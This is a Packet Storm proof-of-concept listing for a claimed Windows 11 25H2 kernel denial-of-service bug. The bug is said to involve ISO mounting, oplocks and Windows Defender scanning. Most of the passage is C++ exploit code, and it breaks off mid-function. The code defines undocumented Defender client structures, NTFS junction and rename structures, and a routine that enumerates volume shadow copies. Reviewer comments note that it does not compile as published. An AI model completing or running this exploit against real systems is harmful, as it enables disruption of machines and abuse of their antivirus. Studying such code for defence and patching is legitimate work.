
📄 Microsoft Windows Kernel ISO Mount / Oplock Deserialization Denial of Service (PACKETSTORM:223817)

Description

Proof of concept exploit for a logic-based denial of service vulnerability in Windows 11 25H2 Build 26200 that causes permanent kernel state corruption through ISO mounting, oplocks, and Windows Defender scanning...

Basic Information

ID PACKETSTORM:223817
Published Jun 18, 2026 at 00:00

Affected Product

Affected Versions

==================================================================================================================================
| # Title : Windows Kernel Logical Denial of Service via ISO Mount + Oplock Deserialization |
| # Author : indoushka |
| # Tested on : Windows 11 Pro (French locale) / browser : Mozilla Firefox 151.0.3 (64-bit) |
| # Vendor : Microsoft — affected: Windows 11 25H2 (Build 26200) and later (per the author) |
==================================================================================================================================

[+] Summary : A Logical Denial of Service (LDoS) vulnerability in Windows 11 25H2 (Build 26200) that, according to the author, causes permanent kernel state corruption through ISO mounting, oplocks, and Windows Defender scanning. Reviewer notes: the PoC below is a local program that depends on Windows Defender being installed (it loads MpClient.dll from the Defender install directory read from HKLM) and on a mounted ISO image from which it copies a file; as published the listing has compile-time defects (rawData[2] is given six initialisers, and the MPTHREAT_SEVERITY / MPTHREAT_CATEGORY / MPTHREAT_STATUS types used in MPTHREAT_INFO are never declared), so it will need fixing before it builds.

[+] Payload :


#define _CRT_SECURE_NO_WARNINGS
#define _WIN32_DCOM
#include <iostream>
#include <Windows.h>
#include <Psapi.h>
#include <winternl.h>
#include <conio.h>
#include <ntstatus.h>
#include <virtdisk.h>
#include <shlwapi.h>
#include <initguid.h>
#include <ole2.h>
#include <comdef.h>
#include <taskschd.h>
#include <bcrypt.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

#pragma comment(lib, "kernel32.lib")
#pragma comment(lib, "bcrypt.lib")
#pragma comment(lib, "taskschd.lib")
#pragma comment(lib, "comsupp.lib")
#pragma comment(lib, "virtdisk.lib")
#pragma comment(lib, "ntdll.lib")
#pragma comment(lib, "Rpcrt4.lib")
#pragma comment(lib, "shlwapi.lib")

// Process-wide state shared by the worker threads below.
wchar_t zippath[MAX_PATH]{};        // path handed to the Defender scan (see WDStartScan)
HMODULE ntdllhm{ nullptr };         // not referenced in the visible part of the listing
HANDLE g_poseidonevent{ nullptr };  // not referenced in the visible part of the listing
bool g_poseidonexit{ false };       // not referenced in the visible part of the listing
char g_poseidonbuf[0x1000]{};       // not referenced in the visible part of the listing

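// Six zero bytes. The original declared this as rawData[2] with six initialisers, which is
// ill-formed in C++ (too many initialisers); let the compiler size the array from the list.
// Not referenced in the visible part of the listing.
unsigned char rawData[] = {
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00
};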

// Native API entry points resolved at run time. Every pointer starts out null; the code that
// fills them in is not in the visible part of the listing, so callers must not assume they are set.
using NtSetInformationFile_t = NTSTATUS(WINAPI*)(HANDLE FileHandle, PIO_STATUS_BLOCK IoStatusBlock,
                                                 PVOID FileInformation, ULONG Length,
                                                 FILE_INFORMATION_CLASS FileInformationClass);
using NtDeleteFile_t = NTSTATUS(WINAPI*)(POBJECT_ATTRIBUTES ObjectAttributes);
using NtOpenDirectoryObject_t = NTSTATUS(WINAPI*)(PHANDLE DirectoryHandle, ACCESS_MASK DesiredAccess,
                                                  POBJECT_ATTRIBUTES ObjectAttributes);
using NtQueryDirectoryObject_t = NTSTATUS(WINAPI*)(HANDLE DirectoryHandle, PVOID Buffer, ULONG Length,
                                                   BOOLEAN ReturnSingleEntry, BOOLEAN RestartScan,
                                                   PULONG Context, PULONG ReturnLength);
using NtQueryInformationFile_t = NTSTATUS(WINAPI*)(HANDLE FileHandle, PIO_STATUS_BLOCK IoStatusBlock,
                                                   PVOID FileInformation, ULONG Length,
                                                   FILE_INFORMATION_CLASS FileInformationClass);

NtSetInformationFile_t _NtSetInformationFile = nullptr;       // used by MoveToTempDir
NtDeleteFile_t _NtDeleteFile = nullptr;                       // unused in the visible listing
NtOpenDirectoryObject_t _NtOpenDirectoryObject = nullptr;     // used by ShadowCopyFinderThread
NtQueryDirectoryObject_t _NtQueryDirectoryObject = nullptr;   // used by the VSS enumeration code
NtQueryInformationFile_t _NtQueryInformationFile = nullptr;   // unused in the visible listing

// Byte-offset pointer arithmetic helper. Not referenced in the visible part of the listing.
// NOTE(review): the WDK's ntdef.h defines a macro of the same name; pulling that header in
// alongside this one would produce a redefinition warning.
#define RtlOffsetToPointer(Base, Offset) ((PUCHAR)(((PUCHAR)(Base)) + ((ULONG_PTR)(Offset))))
// Private copies of NT-internal enumerations and structures. They live in their own namespace so
// they do not collide with the shorter definitions winternl.h places at global scope under the
// same names (SYSTEM_INFORMATION_CLASS, FILE_INFORMATION_CLASS).
namespace custom_defs {
    // Full SystemInformationClass layout. Counting from SystemBasicInformation = 0 gives
    // SystemHandleInformation = 16 and SystemExtendedHandleInformation = 64, the classes that the
    // two handle structures below describe. Nothing in the visible listing queries these classes.
    typedef enum _SYSTEM_INFORMATION_CLASS {
        SystemBasicInformation,
        SystemProcessorInformation,
        SystemPerformanceInformation,
        SystemTimeOfDayInformation,
        SystemPathInformation,
        SystemProcessInformation,
        SystemCallCountInformation,
        SystemDeviceInformation,
        SystemProcessorPerformanceInformation,
        SystemFlagsInformation,
        SystemCallTimeInformation,
        SystemModuleInformation,
        SystemLocksInformation,
        SystemStackTraceInformation,
        SystemPagedPoolInformation,
        SystemNonPagedPoolInformation,
        SystemHandleInformation,
        SystemObjectInformation,
        SystemPageFileInformation,
        SystemVdmInstemulInformation,
        SystemVdmBopInformation,
        SystemFileCacheInformation,
        SystemPoolTagInformation,
        SystemInterruptInformation,
        SystemDpcBehaviorInformation,
        SystemFullMemoryInformation,
        SystemLoadGdiDriverInformation,
        SystemUnloadGdiDriverInformation,
        SystemTimeAdjustmentInformation,
        SystemSummaryMemoryInformation,
        SystemMirrorMemoryInformation,
        SystemPerformanceTraceInformation,
        SystemObsolete0,
        SystemExceptionInformation,
        SystemCrashDumpStateInformation,
        SystemKernelDebuggerInformation,
        SystemContextSwitchInformation,
        SystemRegistryQuotaInformation,
        SystemExtendServiceTableInformation,
        SystemPrioritySeparation,
        SystemVerifierAddDriverInformation,
        SystemVerifierRemoveDriverInformation,
        SystemProcessorIdleInformation,
        SystemLegacyDriverInformation,
        SystemCurrentTimeZoneInformation,
        SystemLookasideInformation,
        SystemTimeSlipNotification,
        SystemSessionCreate,
        SystemSessionDetach,
        SystemSessionInformation,
        SystemRangeStartInformation,
        SystemVerifierInformation,
        SystemVerifierThunkExtend,
        SystemSessionProcessInformation,
        SystemLoadGdiDriverInSystemSpace,
        SystemNumaProcessorMap,
        SystemPrefetcherInformation,
        SystemExtendedProcessInformation,
        SystemRecommendedSharedDataAlignment,
        SystemComPlusPackage,
        SystemNumaAvailableMemory,
        SystemProcessorPowerInformation,
        SystemEmulationBasicInformation,
        SystemEmulationProcessorInformation,
        SystemExtendedHandleInformation,
        SystemLostDelayedWriteInformation,
        SystemBigPoolInformation,
        SystemSessionPoolTagInformation,
        SystemSessionMappedViewInformation,
        SystemHotpatchInformation,
        SystemObjectSecurityMode,
        SystemWatchdogTimerHandler,
        SystemWatchdogTimerInformation,
        SystemLogicalProcessorInformation,
        SystemWow64SharedInformationObsolete,
        SystemRegisterFirmwareTableInformationHandler,
        SystemFirmwareTableInformation,
        SystemModuleInformationEx,
        SystemVerifierTriageInformation,
        SystemSuperfetchInformation,
        SystemMemoryListInformation,
        SystemFileCacheInformationEx,
        SystemThreadPriorityClientIdInformation,
        SystemProcessorIdleCycleTimeInformation,
        SystemVerifierCancellationInformation,
        SystemProcessorPowerInformationEx,
        SystemRefTraceInformation,
        SystemSpecialPoolInformation,
        SystemProcessIdInformation,
        SystemErrorPortInformation,
        SystemBootEnvironmentInformation,
        SystemHypervisorInformation,
        SystemVerifierInformationEx,
        SystemTimeZoneInformation,
        SystemImageFileExecutionOptionsInformation,
        SystemCoverageInformation,
        SystemPrefetchPatchInformation,
        SystemVerifierFaultsInformation,
        SystemSystemPartitionInformation,
        SystemSystemDiskInformation,
        SystemProcessorPerformanceDistribution,
        SystemNumaProximityNodeInformation,
        SystemDynamicTimeZoneInformation,
        SystemCodeIntegrityInformation,
        SystemProcessorMicrocodeUpdateInformation,
        SystemProcessorBrandString,
        SystemVirtualAddressInformation,
        SystemLogicalProcessorAndGroupInformation,
        SystemProcessorCycleTimeInformation,
        SystemStoreInformation,
        SystemRegistryAppendString,
        SystemAitSamplingValue,
        SystemVhdBootInformation,
        SystemCpuQuotaInformation,
        SystemNativeBasicInformation,
        SystemErrorPortTimeouts,
        SystemLowPriorityIoInformation,
        SystemTpmBootEntropyInformation,
        SystemVerifierCountersInformation,
        SystemPagedPoolInformationEx,
        SystemSystemPtesInformationEx,
        SystemNodeDistanceInformation,
        SystemAcpiAuditInformation,
        SystemBasicPerformanceInformation,
        SystemQueryPerformanceCounterInformation,
        SystemSessionBigPoolInformation,
        SystemBootGraphicsInformation,
        SystemScrubPhysicalMemoryInformation,
        SystemBadPageInformation,
        SystemProcessorProfileControlArea,
        SystemCombinePhysicalMemoryInformation,
        SystemEntropyInterruptTimingInformation,
        SystemConsoleInformation,
        SystemPlatformBinaryInformation,
        SystemPolicyInformation,
        SystemHypervisorProcessorCountInformation,
        SystemDeviceDataInformation,
        SystemDeviceDataEnumerationInformation,
        SystemMemoryTopologyInformation,
        SystemMemoryChannelInformation,
        SystemBootLogoInformation,
        SystemProcessorPerformanceInformationEx,
        SystemCriticalProcessErrorLogInformation,
        SystemSecureBootPolicyInformation,
        SystemPageFileInformationEx,
        SystemSecureBootInformation,
        SystemEntropyInterruptTimingRawInformation,
        SystemPortableWorkspaceEfiLauncherInformation,
        SystemFullProcessInformation,
        SystemKernelDebuggerInformationEx,
        SystemBootMetadataInformation,
        SystemSoftRebootInformation,
        SystemElamCertificateInformation,
        SystemOfflineDumpConfigInformation,
        SystemProcessorFeaturesInformation,
        SystemRegistryReconciliationInformation,
        SystemEdidInformation,
        SystemManufacturingInformation,
        SystemEnergyEstimationConfigInformation,
        SystemHypervisorDetailInformation,
        SystemProcessorCycleStatsInformation,
        SystemVmGenerationCountInformation,
        SystemTrustedPlatformModuleInformation,
        SystemKernelDebuggerFlags,
        SystemCodeIntegrityPolicyInformation,
        SystemIsolatedUserModeInformation,
        SystemHardwareSecurityTestInterfaceResultsInformation,
        SystemSingleModuleInformation,
        SystemAllowedCpuSetsInformation,
        SystemVsmProtectionInformation,
        SystemInterruptCpuSetsInformation,
        SystemSecureBootPolicyFullInformation,
        SystemCodeIntegrityPolicyFullInformation,
        SystemAffinitizedInterruptProcessorInformation,
        SystemRootSiloInformation,
        SystemCpuSetInformation,
        SystemCpuSetTagInformation,
        SystemWin32WerStartCallout,
        SystemSecureKernelProfileInformation,
        SystemCodeIntegrityPlatformManifestInformation,
        SystemInterruptSteeringInformation,
        SystemSupportedProcessorArchitectures,
        SystemMemoryUsageInformation,
        SystemCodeIntegrityCertificateInformation,
        SystemPhysicalMemoryInformation,
        SystemControlFlowTransition,
        SystemKernelDebuggingAllowed,
        SystemActivityModerationExeState,
        SystemActivityModerationUserSettings,
        SystemCodeIntegrityPoliciesFullInformation,
        SystemCodeIntegrityUnlockInformation,
        SystemIntegrityQuotaInformation,
        SystemFlushInformation,
        SystemProcessorIdleMaskInformation,
        SystemSecureDumpEncryptionInformation,
        SystemWriteConstraintInformation,
        SystemKernelVaShadowInformation,
        SystemHypervisorSharedPageInformation,
        SystemFirmwareBootPerformanceInformation,
        SystemCodeIntegrityVerificationInformation,
        SystemFirmwarePartitionInformation,
        SystemSpeculationControlInformation,
        SystemDmaGuardPolicyInformation,
        SystemEnclaveLaunchControlInformation,
        SystemWorkloadAllowedCpuSetsInformation,
        SystemCodeIntegrityUnlockModeInformation,
        SystemLeapSecondInformation,
        SystemFlags2Information,
        SystemSecurityModelInformation,
        SystemCodeIntegritySyntheticCacheInformation,
        SystemFeatureConfigurationInformation,
        SystemFeatureConfigurationSectionInformation,
        SystemFeatureUsageSubscriptionInformation,
        SystemSecureSpeculationControlInformation,
        SystemSpacesBootInformation,
        SystemFwRamdiskInformation,
        SystemWheaIpmiHardwareInformation,
        SystemDifSetRuleClassInformation,
        SystemDifClearRuleClassInformation,
        SystemDifApplyPluginVerificationOnDriver,
        SystemDifRemovePluginVerificationOnDriver,
        SystemShadowStackInformation,
        SystemBuildVersionInformation,
        SystemPoolLimitInformation,
        SystemCodeIntegrityAddDynamicStore,
        SystemCodeIntegrityClearDynamicStores,
        SystemDifPoolTrackingInformation,
        SystemPoolZeroingInformation,
        SystemDpcWatchdogInformation,
        SystemDpcWatchdogInformation2,
        SystemSupportedProcessorArchitectures2,
        SystemSingleProcessorRelationshipInformation,
        SystemXfgCheckFailureInformation,
        SystemIommuStateInformation,
        SystemHypervisorMinrootInformation,
        SystemHypervisorBootPagesInformation,
        SystemPointerAuthInformation,
        SystemSecureKernelDebuggerInformation,
        SystemOriginalImageFeatureInformation,
        SystemMemoryNumaInformation,
        SystemMemoryNumaPerformanceInformation,
        SystemCodeIntegritySignedPoliciesFullInformation,
        SystemSecureCoreInformation,
        SystemTrustedAppsRuntimeInformation,
        SystemBadPageInformationEx,
        SystemResourceDeadlockTimeout,
        SystemBreakOnContextUnwindFailureInformation,
        SystemOslRamdiskInformation,
        SystemCodeIntegrityPolicyManagementInformation,
        SystemMemoryNumaCacheInformation,
        SystemProcessorFeaturesBitMapInformation,
        SystemRefTraceInformationEx,
        SystemBasicProcessInformation,
        SystemHandleCountInformation,
        SystemRuntimeAttestationReport,
        SystemPoolTagInformation2,
        SystemCodeIntegrityEndpointSecurityInformation,
        MaxSystemInfoClass
    } SYSTEM_INFORMATION_CLASS;
    // One record of the SystemExtendedHandleInformation result. Not referenced in the visible listing.
    typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX {
        PVOID Object;
        HANDLE UniqueProcessId;
        HANDLE HandleValue;
        ACCESS_MASK GrantedAccess;
        USHORT CreatorBackTraceIndex;
        USHORT ObjectTypeIndex;
        ULONG HandleAttributes;
        ULONG Reserved;
    } SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX;
    // Header of the SystemExtendedHandleInformation result; Handles[] is variable-length.
    typedef struct _SYSTEM_HANDLE_INFORMATION_EX {
        ULONG_PTR NumberOfHandles;
        ULONG_PTR Reserved;
        _Field_size_(NumberOfHandles) SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1];
    } SYSTEM_HANDLE_INFORMATION_EX, * PSYSTEM_HANDLE_INFORMATION_EX;
    // Full FileInformationClass layout (1-based). The only enumerator the visible listing uses is
    // FileRenameInformationEx (= 65 by this numbering), cast to the global FILE_INFORMATION_CLASS
    // in MoveToTempDir.
    typedef enum _FILE_INFORMATION_CLASS {
        FileDirectoryInformation = 1,
        FileFullDirectoryInformation,
        FileBothDirectoryInformation,
        FileBasicInformation,
        FileStandardInformation,
        FileInternalInformation,
        FileEaInformation,
        FileAccessInformation,
        FileNameInformation,
        FileRenameInformation,
        FileLinkInformation,
        FileNamesInformation,
        FileDispositionInformation,
        FilePositionInformation,
        FileFullEaInformation,
        FileModeInformation,
        FileAlignmentInformation,
        FileAllInformation,
        FileAllocationInformation,
        FileEndOfFileInformation,
        FileAlternateNameInformation,
        FileStreamInformation,
        FilePipeInformation,
        FilePipeLocalInformation,
        FilePipeRemoteInformation,
        FileMailslotQueryInformation,
        FileMailslotSetInformation,
        FileCompressionInformation,
        FileObjectIdInformation,
        FileCompletionInformation,
        FileMoveClusterInformation,
        FileQuotaInformation,
        FileReparsePointInformation,
        FileNetworkOpenInformation,
        FileAttributeTagInformation,
        FileTrackingInformation,
        FileIdBothDirectoryInformation,
        FileIdFullDirectoryInformation,
        FileValidDataLengthInformation,
        FileShortNameInformation,
        FileIoCompletionNotificationInformation,
        FileIoStatusBlockRangeInformation,
        FileIoPriorityHintInformation,
        FileSfioReserveInformation,
        FileSfioVolumeInformation,
        FileHardLinkInformation,
        FileProcessIdsUsingFileInformation,
        FileNormalizedNameInformation,
        FileNetworkPhysicalNameInformation,
        FileIdGlobalTxDirectoryInformation,
        FileIsRemoteDeviceInformation,
        FileUnusedInformation,
        FileNumaNodeInformation,
        FileStandardLinkInformation,
        FileRemoteProtocolInformation,
        FileRenameInformationBypassAccessCheck,
        FileLinkInformationBypassAccessCheck,
        FileVolumeNameInformation,
        FileIdInformation,
        FileIdExtdDirectoryInformation,
        FileReplaceCompletionInformation,
        FileHardLinkFullIdInformation,
        FileIdExtdBothDirectoryInformation,
        FileDispositionInformationEx,
        FileRenameInformationEx,
        FileRenameInformationExBypassAccessCheck,
        FileDesiredStorageClassInformation,
        FileStatInformation,
        FileMemoryPartitionInformation,
        FileStatLxInformation,
        FileCaseSensitiveInformation,
        FileLinkInformationEx,
        FileLinkInformationExBypassAccessCheck,
        FileStorageReserveIdInformation,
        FileCaseSensitiveInformationForceAccessCheck,
        FileKnownFolderInformation,
        FileStatBasicInformation,
        FileId64ExtdDirectoryInformation,
        FileId64ExtdBothDirectoryInformation,
        FileIdAllExtdDirectoryInformation,
        FileIdAllExtdBothDirectoryInformation,
        FileStreamReservationInformation,
        FileMupProviderInfo,
        FileMaximumInformation
    } FILE_INFORMATION_CLASS, * PFILE_INFORMATION_CLASS;
}
// --- MpClient.dll (Windows Defender client API) types ------------------------------------------
// This interface is undocumented; the enums and structures below are reconstructed definitions
// carried over from the original listing. The members the visible code actually touches are
// MPRESOURCE_INFO / MPSCAN_RESOURCES (filled in by WDStartScan) and MPTHREAT_INFO::ThreatStatus.
typedef HANDLE MPHANDLE;
typedef HANDLE* PMPHANDLE;
typedef ULONG MPTHREAT_ID;
typedef ULONG MPRESOURCE_CLASS;
typedef LPWSTR MP_MIDL_STRING;

typedef enum tagMPTHREAT_TYPE {
    MPTHREAT_TYPE_KNOWNBAD = 0,   // the type WDStartScan asks MpThreatOpen for
    MPTHREAT_TYPE_BEHAVIOR = 1,
    MPTHREAT_TYPE_UNKNOWN = 2,
    MPTHREAT_TYPE_KNOWNGOOD = 3,
    MPTHREAT_TYPE_NIS = 4,
    MPTHREAT_TYPE_MAXVALUE = 4
} MPTHREAT_TYPE;

typedef enum tagMPTHREAT_SOURCE {
    MPTHREAT_SOURCE_SCAN = 0,     // the source WDStartScan asks MpThreatOpen for
    MPTHREAT_SOURCE_ACTIVE = 1,
    MPTHREAT_SOURCE_HISTORY = 2,
    MPTHREAT_SOURCE_QUARANTINE = 3,
    MPTHREAT_SOURCE_SIGNATURE = 4,
    MPTHREAT_SOURCE_STATE = 5,
    MPTHREAT_SOURCE_MAXVALUE = 5
} MPTHREAT_SOURCE;

typedef enum tagMPSCAN_TYPE {
    MPSCAN_TYPE_UNKNOWN = 0,
    MPSCAN_TYPE_QUICK = 1,
    MPSCAN_TYPE_FULL = 2,
    MPSCAN_TYPE_RESOURCE = 3,     // scan a specific resource list; used by WDStartScan
    MPSCAN_TYPE_MAXVALUE = 3
} MPSCAN_TYPE;

typedef enum tagMPTHREAT_ACTION {
    MP_THREAT_ACTION_UNKNOWN = 0,
    MP_THREAT_ACTION_CLEAN = 1,
    MP_THREAT_ACTION_QUARANTINE = 2,
    MP_THREAT_ACTION_REMOVE = 3,
    MP_THREAT_ACTION_ALLOW = 6,
    MP_THREAT_ACTION_USERDEFINED = 8,
    MP_THREAT_ACTION_NOACTION = 9,
    MP_THREAT_ACTION_BLOCK = 10,
    MP_THREAT_ACTION_MAX_VALUE = 10
} MPTHREAT_ACTION;

// NOTE(review): MPTHREAT_SEVERITY, MPTHREAT_CATEGORY and MPTHREAT_STATUS are not declared anywhere
// in this listing, so this struct does not compile as published; they have to be supplied (the
// code compares ThreatStatus with 0x1, so an integer-like type is expected, but the exact
// definition is not verifiable from here). The two inline arrays are far larger than any plausible
// count; they only affect the offsets of later members, and the one member the visible code reads
// (ThreatStatus) precedes them. Instances are returned by MpThreatEnumerate, not allocated here.
typedef struct tagMPTHREAT_INFO {
    MPTHREAT_ID ThreatID;
    GUID DetectionID;
    MP_MIDL_STRING Name;
    MPTHREAT_TYPE ThreatType;
    MPTHREAT_SEVERITY ThreatCriticality;
    MPTHREAT_CATEGORY ThreatCategory;
    DWORD ThreatShortDescriptionID;
    DWORD ThreatAdviseDescriptionID;
    MPTHREAT_STATUS ThreatStatus;
    DWORD SuggestedActionCount;
    MPTHREAT_ACTION SuggestedActionArray[10000];
    DWORD ResourceCount;
    PVOID ResourceList[1024];
    ULARGE_INTEGER ThreatStatusTime;
    HRESULT ThreatStatusCode;
    DWORD ThreatDetection;
    GUID QuarantineGuid;
    DWORD ExecutionStatus;
    PVOID Data;
    DWORD State;
    MP_MIDL_STRING DetectionUser;
    DWORD DetectionSource;
    MP_MIDL_STRING ProcessName;
    DWORD DetectionOrigin;
    DWORD reserved1;
    ULARGE_INTEGER DetectionTime;
    DWORD PreExecutionStatus;
    ULARGE_INTEGER RemediationTime;
    DWORD PostExecutionStatus;
    BOOL CriticalFailure;
    DWORD NonCriticalReason;
    MP_MIDL_STRING RemediationUser;
    DWORD RemediationResourceCount;
    PVOID RemediationResourceList[1024];
    BOOL FailureResolved;
    DWORD ResolvedReason;
    DWORD AdditionalActions;
    DWORD ResolvedActions;
    DWORD dwThreatStatusFlag;
} MPTHREAT_INFO, * PMPTHREAT_INFO;

//  One resource to scan; WDStartScan uses Scheme "file" and Path = zippath.
typedef struct tagMPRESOURCE_INFO {
    MP_MIDL_STRING Scheme;
    MP_MIDL_STRING Path;
    MPRESOURCE_CLASS Class;
} MPRESOURCE_INFO, * PMPRESOURCE_INFO;

typedef struct tagMPSCAN_RESOURCES {
    DWORD dwResourceCount;
    PMPRESOURCE_INFO pResourceList;
} MPSCAN_RESOURCES, * PMPSCAN_RESOURCES;

// Decompiler-style reconstruction; only ever passed as NULL in the visible listing.
typedef struct tagMPCALLBACK_INFO {
    void* CallbackHandler;
    __int64 v4;
} MPCALLBACK_INFO, * PMPCALLBACK_INFO;

// --- Native API structures that winternl.h does not expose (normally from the WDK headers) -----
typedef struct _FILE_BASIC_INFORMATION {
    LARGE_INTEGER CreationTime;
    LARGE_INTEGER LastAccessTime;
    LARGE_INTEGER LastWriteTime;
    LARGE_INTEGER ChangeTime;
    ULONG FileAttributes;
} FILE_BASIC_INFORMATION, * PFILE_BASIC_INFORMATION;

// Payload of FileRenameInformation / FileRenameInformationEx. The union lets the same layout
// serve both classes: the Ex variant reads Flags where the legacy one reads ReplaceIfExists.
// FileName is not NUL-terminated; FileNameLength is in bytes. Used by MoveToTempDir.
typedef struct _FILE_RENAME_INFORMATION {
    union {
        BOOLEAN ReplaceIfExists;
        ULONG Flags;
    } DUMMYUNIONNAME;
    HANDLE RootDirectory;
    ULONG FileNameLength;
    WCHAR FileName[1];
} FILE_RENAME_INFORMATION, * PFILE_RENAME_INFORMATION;

// FSCTL_SET_REPARSE_POINT input; the MountPointReparseBuffer arm is what CreateJunction fills.
typedef struct _REPARSE_DATA_BUFFER {
    ULONG ReparseTag;
    USHORT ReparseDataLength;
    USHORT Reserved;
    union {
        struct {
            USHORT SubstituteNameOffset;
            USHORT SubstituteNameLength;
            USHORT PrintNameOffset;
            USHORT PrintNameLength;
            ULONG Flags;
            WCHAR PathBuffer[1];
        } SymbolicLinkReparseBuffer;
        struct {
            USHORT SubstituteNameOffset;
            USHORT SubstituteNameLength;
            USHORT PrintNameOffset;
            USHORT PrintNameLength;
            WCHAR PathBuffer[1];
        } MountPointReparseBuffer;
        struct {
            UCHAR DataBuffer[1];
        } GenericReparseBuffer;
    } DUMMYUNIONNAME;
} REPARSE_DATA_BUFFER, * PREPARSE_DATA_BUFFER;

// Size of the fixed header in front of the union (8 bytes); CreateJunction adds it to the path
// buffer size to get the total FSCTL input length.
#define REPARSE_DATA_BUFFER_HEADER_LENGTH FIELD_OFFSET(REPARSE_DATA_BUFFER, GenericReparseBuffer.DataBuffer)
// NOTE(review): winnt.h appears to define this macro itself (as a FIELD_OFFSET into
// REPARSE_GUID_DATA_BUFFER, which is larger than 8); redefining it here triggers a redefinition
// warning. Nothing in the visible listing uses it.
#define REPARSE_GUID_DATA_BUFFER_HEADER_SIZE 0x8

// Not referenced in the visible listing.
typedef struct _FILE_DISPOSITION_INFORMATION_EX {
    ULONG Flags;
} FILE_DISPOSITION_INFORMATION_EX, * PFILE_DISPOSITION_INFORMATION_EX;
// One record returned by NtQueryDirectoryObject. The VSS enumeration code below assumes the
// record array is terminated by an all-zero record and that both strings are NUL-terminated.
typedef struct _OBJECT_DIRECTORY_INFORMATION {
    UNICODE_STRING Name;
    UNICODE_STRING TypeName;
} OBJECT_DIRECTORY_INFORMATION, * POBJECT_DIRECTORY_INFORMATION;
// Singly linked list of shadow-copy device names (e.g. "HarddiskVolumeShadowCopy12").
// Each node and each name is a separate malloc() block.
struct LLShadowVolumeNames {
    wchar_t* name;
    LLShadowVolumeNames* next;
};

// Free every node (and its name) of a list built by RetrieveCurrentVSSList. A null head is a no-op.
void DestroyVSSNamesList(LLShadowVolumeNames* First) {
    for (LLShadowVolumeNames* node = First; node != nullptr;) {
        LLShadowVolumeNames* const following = node->next;
        free(node->name);
        free(node);
        node = following;
    }
}
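// Append a NUL-terminated copy of `name` (Length bytes, not necessarily terminated) to the list
// described by head/tail. Returns false and leaves the list untouched when malloc fails.
static bool AppendVSSName(LLShadowVolumeNames*& head, LLShadowVolumeNames*& tail, const UNICODE_STRING& name) {
    LLShadowVolumeNames* node = (LLShadowVolumeNames*)malloc(sizeof(LLShadowVolumeNames));
    if (!node)
        return false;
    ZeroMemory(node, sizeof(*node));
    node->name = (wchar_t*)malloc(name.Length + sizeof(wchar_t));
    if (!node->name) {
        free(node);
        return false;
    }
    ZeroMemory(node->name, name.Length + sizeof(wchar_t));   // guarantees the terminator
    memmove(node->name, name.Buffer, name.Length);
    if (tail)
        tail->next = node;
    else
        head = node;
    tail = node;
    return true;
}

// Snapshot the "\Device" object directory (opened by the caller as `hobjdir`) and collect the
// names of every Device object whose name starts with "HarddiskVolumeShadowCopy".
// Returns the list head (NULL when there are none); *vscnumber receives the count.
// On failure *criticalerr is set, *errorcode receives a Win32 error and NULL is returned.
// All three out-parameters must be non-null.
//
// Fixes relative to the original: the enumeration context is reset when the buffer is regrown
// (re-using it after STATUS_MORE_ENTRIES silently dropped the entries already returned), the
// all-zero terminator is a stack value instead of an unchecked and leaked malloc, the entry loop
// is bounded by the buffer size, and the directory buffer is freed on every error path.
LLShadowVolumeNames* RetrieveCurrentVSSList(HANDLE hobjdir, bool* criticalerr, int* vscnumber, DWORD* errorcode) {
    if (!criticalerr || !vscnumber || !errorcode)
        return NULL;
    *vscnumber = 0;

    // Grow the buffer until the whole directory fits in one call; every attempt restarts the scan.
    ULONG reqsz = sizeof(OBJECT_DIRECTORY_INFORMATION) + (UNICODE_STRING_MAX_BYTES * 2);
    OBJECT_DIRECTORY_INFORMATION* objdirinfo = NULL;
    for (;;) {
        objdirinfo = (OBJECT_DIRECTORY_INFORMATION*)malloc(reqsz);
        if (!objdirinfo) {
            printf("[!] Failed to allocate buffer for object manager directory query.\n");
            *criticalerr = true;
            *errorcode = ERROR_NOT_ENOUGH_MEMORY;
            return NULL;
        }
        ZeroMemory(objdirinfo, reqsz);
        ULONG scanctx = 0;
        ULONG retsz = 0;
        const NTSTATUS stat = _NtQueryDirectoryObject(hobjdir, objdirinfo, reqsz, FALSE, TRUE, &scanctx, &retsz);
        if (stat == STATUS_SUCCESS)
            break;
        free(objdirinfo);
        objdirinfo = NULL;
        if (stat != STATUS_MORE_ENTRIES) {
            printf("[!] NtQueryDirectoryObject failed with 0x%0.8X\n", stat);
            *criticalerr = true;
            *errorcode = RtlNtStatusToDosError(stat);
            return NULL;
        }
        reqsz += sizeof(OBJECT_DIRECTORY_INFORMATION) + 0x100;
    }

    // The record array ends with an all-zero record; the buffer size is a hard upper bound in
    // case that terminator is ever missing.
    OBJECT_DIRECTORY_INFORMATION emptyentry;
    ZeroMemory(&emptyentry, sizeof(emptyentry));
    const ULONG maxentries = reqsz / sizeof(OBJECT_DIRECTORY_INFORMATION);
    static const wchar_t prefix[] = L"HarddiskVolumeShadowCopy";
    const size_t prefixbytes = sizeof(prefix) - sizeof(wchar_t);   // compare without the terminator
    LLShadowVolumeNames* head = NULL;
    LLShadowVolumeNames* tail = NULL;

    for (ULONG i = 0; i < maxentries; i++) {
        const OBJECT_DIRECTORY_INFORMATION& entry = objdirinfo[i];
        if (memcmp(&entry, &emptyentry, sizeof(emptyentry)) == 0)
            break;
        if (!entry.TypeName.Buffer || !entry.Name.Buffer)
            continue;
        // TypeName is assumed NUL-terminated (as the original assumed); the Name prefix match is
        // done on raw bytes, case-sensitively, and requires at least one character after the prefix.
        if (_wcsicmp(L"Device", entry.TypeName.Buffer) != 0)
            continue;
        if (entry.Name.Length < sizeof(prefix) || memcmp(prefix, entry.Name.Buffer, prefixbytes) != 0)
            continue;
        if (!AppendVSSName(head, tail, entry.Name)) {
            printf("[!] Failed to allocate memory.\n");
            *criticalerr = true;
            *errorcode = ERROR_NOT_ENOUGH_MEMORY;
            DestroyVSSNamesList(head);
            free(objdirinfo);
            return NULL;
        }
        (*vscnumber)++;
    }

    free(objdirinfo);
    return head;
}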

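// Read the whole "\Device" directory into a malloc'd buffer, regrowing it until the kernel
// returns STATUS_SUCCESS. *entries receives the number of OBJECT_DIRECTORY_INFORMATION records
// the buffer can hold (an upper bound for walking it). Returns NULL with *err set on failure.
static OBJECT_DIRECTORY_INFORMATION* QueryDeviceDirectory(HANDLE hobjdir, ULONG* entries, DWORD* err) {
    ULONG reqsz = sizeof(OBJECT_DIRECTORY_INFORMATION) + (UNICODE_STRING_MAX_BYTES * 2);
    for (;;) {
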